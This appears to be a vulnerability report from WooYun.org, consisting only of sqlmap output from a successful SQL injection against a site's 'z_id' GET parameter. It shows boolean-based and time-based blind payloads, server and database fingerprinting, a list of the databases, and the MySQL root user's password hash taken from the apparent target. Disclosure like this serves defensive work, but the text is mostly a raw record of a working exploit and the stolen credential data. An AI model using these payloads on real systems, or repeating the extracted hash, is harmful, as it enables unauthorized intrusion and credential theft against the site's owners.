WooYun.org

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: z_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: z_id=270 AND 1442=1442
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: z_id=270 AND (SELECT * FROM (SELECT(SLEEP(5)))ctiY)
---
[14:57:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.3
back-end DBMS: MySQL 5.0.12
[14:57:26] [INFO] fetching database names
[14:57:26] [INFO] fetching number of databases
available databases [4]:
[*] dyjy_d
[*] information_schema
[*] mysql
[*] test
current db: dyjy_d
database management system users [1]:
[*] 'root'@'localhost'
   'root@localhost'
database management system users password hashes:
[*] root [1]:
    password hash: *CCB9F47536983C4CD215821D791FB5A22EBD356F